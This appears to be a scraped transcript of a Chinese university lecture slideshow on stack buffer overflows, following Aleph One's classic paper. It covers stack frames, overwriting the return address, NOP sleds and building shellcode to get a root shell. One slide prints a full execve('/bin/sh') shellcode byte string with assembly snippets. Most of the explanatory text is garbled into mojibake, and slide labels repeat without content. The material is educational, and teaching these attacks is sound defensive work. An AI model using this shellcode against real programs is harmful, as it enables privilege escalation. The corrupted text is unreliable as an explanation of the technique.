buffer overflow 原理簡介
DESCRIPTION
Buffer Overflow 原理簡介. 參考資料 : Smashing The Stack For Fun And Profit (By Aleph One). 逢甲大學資工所 平行實驗室 鍾宜勳. Stack 的運作方式 (1/9). Stack 的運作方式 (2/9). Stack 的運作方式 (3/9). Stack 的運作方式 (4/9). Stack 的運作方式 (5/9). Stack 的運作方式 (6/9). Stack 的運作方式 (7/9). Stack 的運作方式 (8/9). Stack 的運作方式 (9/9). - PowerPoint PPT PresentationTRANSCRIPT
-
Buffer Overflow :Smashing The Stack For Fun And Profit(By Aleph One)
-
Stack(1/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[5];
return ;
Stack
}
C}
Function( )
Main( )
x
-
Stack(2/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[5];
return ;
Stack
}
C}
Function( )
Main( )
0
-
Stack(3/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[5];
return ;
Stack
}
C}
Function( )
Main( )
0
3
2
1
Return address
SFP
-
Stack(4/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[2];
return ;
Stack
}
C}
Function( )
Main( )
3
2
1
Return address
SFP
0
buffer1[1]
buffer1[0]
-
Stack(5/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[2];
return ;
Stack
}
C}
Function( )
Main( )
3
2
1
Return address
SFP
0
buffer1[1]
buffer1[0]
-
Stack(6/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[2];
return ;
Stack
}
C}
Function( )
Main( )
3
2
1
Return address
SFP
0
buffer1[1]
buffer1[0]
-
Stack(7/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[2];
return ;
Stack
}
C}
Function( )
Main( )
0
-
Stack(8/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[2];
return ;
Stack
}
C}
Function( )
Main( )
1
-
Stack(9/9)
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[2];
return ;
Stack
}
C}
Function( )
Main( )
1
-
Stack,Array.Stack,Array.
StackVC}
3
2
1
Return address
SFP
0
buffer1[0]
buffer1[1]
ArrayV}
-
Array(Buffer Overflow)Return AddressSFP
StackVC}
3
2
1
Return address
SFP
0
buffer1[0]
buffer1[1]
ArrayV}
`
StackVC}
3
2
1
Return address
SFP
0
buffer1[0]
buffer1[1]
ArrayV}
LqgJ
buffer1[0]
buffer1[1]
buffer1[2]
buffer1[3]
-
Buffer OverflowReturn AddressReturnAddress
KKKKK
KKKKK
printf(%d, x );
x = 1 ;
Function( 1 , 2 , 3 );
x = 0 ;
int x ;
char buffer1[5];
return ;
?
Function( )
-
Idea 1. Return Address
Buffer OverflowReturn Address,,.codeStack,code.
3
2
1
Return address
SFP
0
movl $0x8,%ebx
movl $0x1,%eax
nop
Return AddressQ,H{^{`~,OStackCode.
StackVC}
int $0x80
{V
-
Idea 2. RootShell
Overflow,suidroot,overflow,shell,rootshell..
3
2
1
Return address
SFP
0
KKKKKK
KKKKKK
KKKKKK
int $0x80
RootPrivilegeShell
StackVC}
{V
@Rootvshell
-
Idea 3. Buffer OverflowIdea,Stackcode,RootShell,:Stackcode?Return Address?buffer overflow?codereturn.sh-2.04$./vulnerable $CODE
Shell Code
Return Address
-
Stackcodereturn address,buffer overflow.
:return address,.
-
Shell CodeStackcode,Shell code.:
jump
{D
r
ReturnAddress
call
jump
pop
StackV
Shell code
-
Shell Code(1/6)
jump
{D
r( )
SFP
ReturnAddress
call
jump
pop
StackV
Shell code
Shell code}
-
Shell Code(2/6)
jump
{D
r( )
SFP
ReturnAddress
call
jump
pop
StackV
Shell code
Shell code,zLcallO,Nre}JStack,oOocode`}qk.
Oo}
-
Shell Code(3/6)
jump
{D
r( )
SFP
ReturnAddress
call
jump
pop
StackV
Shell code
ore},^Shell Code}Y.
-
Shell Code(4/6)
jump
{D
r( )
SFP
ReturnAddress
call
jump
pop
StackV
Shell code
^Shell Code}Y.
-
Shell Code(5/6)
jump
{D
r( )
SFP
ReturnAddress
call
jump
pop
StackV
Shell code
Nre}POPX.
-
Shell Code(6/6)
jump
{D
r( )
SFP
ReturnAddress
call
jump
pop
StackV
Shell code
re},Xru},Nrexecve( ),IsXQnShell.
-
(1/3)Shell Code00H.strcpy(),.,Shell Code00H,\0,Shell Code,,Code.Shell.xor,0,high word0,code00H.: movb $0x0,0x7(%esi) xorl %eax,%eax
-
(2/3),Shell Code.sh-2.04$./vulnerable $CODEshellcode[] ="\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00""\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80""\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff""\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3";
Shell Code
Return Address
-
(3/3)Buffer Overflow,ReturnAddress,Shell Codenop.
jump
{D
r
ReturnAddress
call
jump
pop
StackV
Shell code
NOP
no@Ie
unidNiH\B@F
-
ArrayOverflow,Shell Code..
Array
SFP
ReturnAddress
Zu
Shell Code
sReturnAddress
NOP
StackV
sReturn AddressLk\gbReturn Addressm
-
Array,.Shell Code.StackReturn Address.
Array
SFP
ReturnAddress
StackV
RsReturn Address
NOPMShell Code
StacksReturn Address
sReturnAddress
Shell Code
-
Buffer Overflow,rootpassword,super user,.Cbound checking,C,.bound checking. Bound Checking,!!